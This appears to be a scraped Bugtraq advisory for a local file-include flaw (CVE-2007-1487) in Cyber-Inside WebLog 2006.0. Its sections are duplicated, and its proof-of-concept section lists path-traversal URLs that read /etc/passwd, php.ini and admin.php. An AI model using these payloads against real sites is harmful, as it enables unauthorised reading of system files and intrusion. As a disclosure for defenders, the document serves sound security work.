Cyber-Inside WebLog Local File Include Vulnerability
BID:22995
Info
Cyber-Inside WebLog Local File Include Vulnerability
| Bugtraq ID: | 22995 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-1487 |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 15 2007 12:00AM |
| Updated: | May 12 2015 07:33PM |
| Credit: | Dj7xpl is credited with discovering this vulnerability. |
| Vulnerable: |
Cyber-Inside Weblog 2006.0 |
| Not Vulnerable: | |
Discussion
Cyber-Inside WebLog Local File Include Vulnerability
Cyber-Inside WebLog is prone to a local file-include vulnerability because the application fails to sanitize user-supplied input.
An attacker can exploit this issue to execute arbitrary PHP code and gain remote unauthorized access to the computer in the context of the webserver.
Cyber-Inside WebLog is prone to a local file-include vulnerability because the application fails to sanitize user-supplied input.
An attacker can exploit this issue to execute arbitrary PHP code and gain remote unauthorized access to the computer in the context of the webserver.
Exploit / POC
Cyber-Inside WebLog Local File Include Vulnerability
Attackers may exploit this issue through a browser.
Example URIs are available:
http://localhost/blog/index.php?show=showarticles&file=../../../../windows/php.ini
http://localhost/blog/index.php?show=showarticles&file=../../../../etc/passwd
http://localhost/blog/index.php?show=showarticles&file=../admin.php
Attackers may exploit this issue through a browser.
Example URIs are available:
http://localhost/blog/index.php?show=showarticles&file=../../../../windows/php.ini
http://localhost/blog/index.php?show=showarticles&file=../../../../etc/passwd
http://localhost/blog/index.php?show=showarticles&file=../admin.php
Solution / Fix
Cyber-Inside WebLog Local File Include Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].